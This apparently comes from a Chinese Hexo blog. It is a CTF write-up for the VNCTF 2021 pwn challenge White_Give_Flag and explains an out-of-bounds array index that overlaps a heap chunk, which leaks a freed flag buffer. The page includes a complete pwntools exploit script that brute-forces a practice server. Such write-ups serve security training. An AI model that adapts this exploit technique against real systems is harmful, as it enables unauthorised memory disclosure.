<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<!-- maximum-scale=2 caps pinch-zoom at 200%; consider dropping the cap so user zoom is unrestricted. -->
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <!-- NOTE(review): every favicon slot below, the web-app manifest and msapplication-config all
       point at the same JPEG on a third-party image host. The icon links declare type="image/png",
       rel="manifest" expects a JSON manifest and msapplication-config an XML browserconfig, so it
       looks like one URL was pasted into every theme favicon field. Confirm the intended files, and
       prefer same-origin assets so the site does not depend on that host being up and unchanged. -->
  <link rel="apple-touch-icon" sizes="180x180" href="https://www.hualigs.cn/image/6015799666530.jpg">
  <link rel="icon" type="image/png" sizes="32x32" href="https://www.hualigs.cn/image/6015799666530.jpg">
  <link rel="icon" type="image/png" sizes="16x16" href="https://www.hualigs.cn/image/6015799666530.jpg">
  <link rel="mask-icon" href="https://www.hualigs.cn/image/6015799666530.jpg" color="#222">
  <link rel="manifest" href="https://www.hualigs.cn/image/6015799666530.jpg">
  <meta name="msapplication-config" content="https://www.hualigs.cn/image/6015799666530.jpg">

<link rel="stylesheet" href="/diazang/css/main.css">


<link rel="stylesheet" href="/diazang/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    // Theme-wide NexT settings emitted by Hexo at build time. `CONFIG` is read later on
    // this page by the theme scripts (NexT.utils) and by the inline comment-tab handler
    // (CONFIG.comments). The values are UI, search and motion toggles, not secrets.
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"jue-xian.gitee.io","root":"/diazang/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="题目： [[VNCTF 2021]White_Give_Flag]: https:&#x2F;&#x2F;buuoj.cn&#x2F;challenges#VNCTF%202021White_Give_Flag    “vn” 该题目为VN招新题目，属于一道比较简单的堆和数组的混搭运用">
<meta property="og:type" content="article">
<meta property="og:title" content="vn招新">
<meta property="og:url" content="https://jue-xian.gitee.io/diazang/2021/03/25/vn%E6%8B%9B%E6%96%B0/index.html">
<meta property="og:site_name" content="RUBIA">
<meta property="og:description" content="题目： [[VNCTF 2021]White_Give_Flag]: https:&#x2F;&#x2F;buuoj.cn&#x2F;challenges#VNCTF%202021White_Give_Flag    “vn” 该题目为VN招新题目，属于一道比较简单的堆和数组的混搭运用">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2021/03/25/iFsybXmnZLcp3vu.png">
<meta property="og:image" content="https://i.loli.net/2021/03/25/y9BlhoFv1f6JbdZ.png">
<meta property="og:image" content="https://i.loli.net/2021/03/25/5bxAYL81vMZyaOU.png">
<meta property="og:image" content="https://i.loli.net/2021/03/25/uTRyCw6nbIzdlWZ.png">
<meta property="og:image" content="https://i.loli.net/2021/03/25/4mXbGZ8ux2gnELe.png">
<meta property="og:image" content="https://i.loli.net/2021/03/25/yFmqhenZvoPCLOD.png">
<meta property="article:published_time" content="2021-03-24T16:31:23.000Z">
<meta property="article:modified_time" content="2021-03-25T04:40:28.585Z">
<meta property="article:author" content="H.R.P">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/03/25/iFsybXmnZLcp3vu.png">

<link rel="canonical" href="https://jue-xian.gitee.io/diazang/2021/03/25/vn%E6%8B%9B%E6%96%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  // Per-page flags attached to the theme config object declared in the
  // hexo-configurations script: sidebar variant, index-vs-post, and page language.
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>vn招新 | RUBIA</title>
  






  <noscript>
  <style>
  /* Scripts disabled: the theme's motion effects cannot run, so reset the
     start-state opacity/offset that those animations would otherwise transition
     from (presumably defined on .use-motion in main.css — verify there). */
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/diazang/atom.xml" title="RUBIA" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">

  <div class="site-meta">

    <a href="/diazang/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">RUBIA</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

</div>








</div>
    </header>

    


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://jue-xian.gitee.io/diazang/2021/03/25/vn%E6%8B%9B%E6%96%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://www.hualigs.cn/image/6015786be4309.jpg">
      <meta itemprop="name" content="H.R.P">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="RUBIA">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          vn招新
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-03-25 00:31:23 / 修改时间：12:40:28" itemprop="dateCreated datePublished" datetime="2021-03-25T00:31:23+08:00">2021-03-25</time>
            </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/diazang/2021/03/25/vn%E6%8B%9B%E6%96%B0/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/diazang/2021/03/25/vn%E6%8B%9B%E6%96%B0/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>题目：</p>
<p>[VNCTF 2021]White_Give_Flag：<a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#VNCTF%202021White_Give_Flag">https://buuoj.cn/challenges#VNCTF%202021White_Give_Flag</a>（“vn”）</p>
<p>该题目为VN招新题目，属于一道比较简单的堆和数组的混搭运用</p>
<a id="more"></a>

<p>先看主函数</p>
<p>经典菜单题目</p>
<p>1.create 2.show 3.del 4.edit 5.exit</p>
<p>我们先去初始化函数看看</p>
<p><img src="https://i.loli.net/2021/03/25/iFsybXmnZLcp3vu.png" alt="1.png"></p>
<p>该函数的主要部分：先给 s 变量 malloc 一块堆空间，对 s 进行初始化设定后又把它 free 了</p>
<p>接着又为其开辟了一块大小随机的堆空间，范围在 0x300 到 0x500 之间</p>
<p>然后读入flag</p>
<p><img src="https://i.loli.net/2021/03/25/y9BlhoFv1f6JbdZ.png" alt="2.png"></p>
<p>这里我们用 gdb 调试一下：我在本地创建了一个 flag 文件，看看 s 被 free 后里面的内容是否还在</p>
<p>结果很明显，free后不影响其中的内容。因此我们要想办法去leak其中的内容</p>
<p><img src="https://i.loli.net/2021/03/25/5bxAYL81vMZyaOU.png" alt="4.png"></p>
<p>接着我们看看create函数</p>
<p>最多可创建 4 个堆块，编号分别是 0、1、2、3</p>
<p><img src="https://i.loli.net/2021/03/25/uTRyCw6nbIzdlWZ.png" alt="5.jpg"></p>
<p>查看汇编指令后不难发现，hint 数组越界一位的 hint[-1] 对应的正是 chunk[3]</p>
<p>那么现在的问题就是怎么才能让hint[]越界到hint[-1]</p>
<p>刚才在主函数中可以看见获取 hint 变量下标的函数（篇幅有限，不上图了）</p>
<p>里面用 read 读取输入，关于 read 的行为解释如图（转载于 sKye231）</p>
<p>因此我们可以利用pwntools发送EOF</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">P=remote(<span class="string">&#x27;xxxxxx&#x27;</span>,xxx)</span><br><span class="line"></span><br><span class="line">p.shutdown_raw(<span class="string">&#x27;send&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/03/25/4mXbGZ8ux2gnELe.png" alt="6.png"></p>
<p><img src="https://i.loli.net/2021/03/25/yFmqhenZvoPCLOD.png" alt="7.png"></p>
<p>接着向 chunk[3] 写入 16 个任意字符进行填充，程序就会自动打印出 flag</p>
<p>但是存放 flag 的堆块大小是随机的，只有 chunk[3] 与存放 flag 的堆块大小一致时才会打印 flag</p>
<p>所以我们要进行爆破操作</p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">menu</span>(<span class="params">choice</span>):</span></span><br><span class="line">    p.recvuntil(<span class="string">&#x27;choice:&#x27;</span>)</span><br><span class="line">    p.send(<span class="string">&#x27;1&#x27;</span>*choice)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size</span>):</span></span><br><span class="line">    menu(<span class="number">1</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;size:\n&#x27;</span>)</span><br><span class="line">    p.sendline(<span 
class="built_in">str</span>(size))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,data</span>):</span></span><br><span class="line">    menu(<span class="number">4</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;index:\n&#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;Content:\n&#x27;</span>)</span><br><span class="line">    p.send(data)</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    <span class="comment">#p = process(&quot;./bai&quot;)</span></span><br><span class="line">    p = remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">39123</span>)</span><br><span class="line">    add(<span class="number">0x10</span>)</span><br><span class="line">    add(<span class="number">0x10</span>)</span><br><span class="line">    add(<span class="number">0x10</span>)</span><br><span class="line">    add(<span class="number">0x310</span>)</span><br><span class="line">    edit(<span class="number">3</span>,<span class="string">&#x27;x&#x27;</span>*<span class="number">0x10</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;choice:&#x27;</span>)</span><br><span class="line">    p.shutdown_raw(<span class="string">&#x27;send&#x27;</span>)</span><br><span class="line">    flag = p.recvline()</span><br><span class="line">    log.info(flag)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&#x27;flag&#x27;</span> <span class="keyword">in</span> flag:</span><br><span class="line">        exit(<span class="number">0</span>)</span><br><span class="line">    p.close()</span><br><span class="line">    
sleep(<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

      <footer class="post-footer">

        


        
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  // Comment-system tabs: when the tabs register, re-open the pane the visitor used last.
  // The theme config emitted above exposes `comments.active`, not `comments.activeClass`,
  // so the configured default reads as undefined here and only the stored value matters —
  // NOTE(review): confirm that is intended.
  window.addEventListener('tabs:register', () => {
    const commentsConfig = CONFIG.comments;
    let preferred = commentsConfig.activeClass;
    if (commentsConfig.storage) {
      // A remembered choice wins over the configured default when one exists.
      preferred = localStorage.getItem('comments_active') || preferred;
    }
    if (!preferred) return;
    const tabLink = document.querySelector(`a[href="#comment-${preferred}"]`);
    if (tabLink) tabLink.click();
  });
  if (CONFIG.comments.storage) {
    // Persist which comment pane the visitor selected.
    window.addEventListener('tabs:click', event => {
      const pane = event.target;
      if (!pane.matches('.tabs-comment .tab-content .tab-pane')) return;
      // The pane's second class is taken as the comment-system name — TODO confirm.
      localStorage.setItem('comments_active', pane.classList[1]);
    });
  }
</script>

        </div>
          
  


      </div>
    </main>

  </div>

  
  <script src="/diazang/lib/anime.min.js"></script>
  <script src="/diazang/lib/velocity/velocity.min.js"></script>
  <script src="/diazang/lib/velocity/velocity.ui.min.js"></script>

<script src="/diazang/js/utils.js"></script>

<script src="/diazang/js/motion.js"></script>


<script src="/diazang/js/schemes/pisces.js"></script>


<script src="/diazang/js/next-boot.js"></script>




  




  
<script src="/diazang/js/local-search.js"></script>













  

  


<script>
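// Initialise Valine comments once the theme has loaded the comments container.
// Valine is backed by LeanCloud; appId/appKey are client-side credentials shipped to
// every visitor, so what they permit must be restricted on the backend (allowed web
// domains / ACLs) — NOTE(review): confirm that is configured for this app.
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  // Explicit https: instead of the original protocol-relative URL. The script is still
  // fetched from a third-party CDN at an unpinned version, and getScript as called here
  // takes only a URL (no integrity attribute), so pin a version
  // (e.g. valine@<VERSION>/dist/Valine.min.js) or self-host before relying on it — NOTE(review).
  NexT.utils.getScript('https://unpkg.com/valine/dist/Valine.min.js', () => {
    // Commenter fields to show; the template's split/filter over the same three
    // names always produced exactly this list.
    var guest = ['nick', 'mail', 'link'];
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'g8R6OK66Q2xJiQieSaxzFqVA-gzGzoHsz',
      appKey     : 'V9mmkUCmucvukcz6LwkONqXa',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10',     // template emitted `'10' || 10`, which is always the string
      visitor    : false,
      lang       : 'zh-cn',  // template emitted `'' || 'zh-cn'`
      path       : location.pathname,
      recordIP   : false,    // do not store commenter IP addresses
      serverURLs : ''
    });
  }, window.Valine);
});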
</script>

</body>
</html>
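<!-- Animated canvas background (third-party). Explicit https: replaces the original
     protocol-relative URL. NOTE(review): there is still no integrity (SRI) attribute and
     no crossorigin, so a compromised or re-pointed CDN would run arbitrary JS on every
     visit — add an SRI hash (placeholder: integrity="<SRI_HASH>") or self-host the file.
     These tags also sit after </html>; the parser tolerates it, but they belong inside <body>. -->
<script src="https://cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
<!-- Small heart effect on page click. NOTE(review): this path is site-root relative (/js/…)
     while every other asset on the page lives under /diazang/ — confirm it resolves. -->
<script src="/js/src/clicklove.js"></script>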


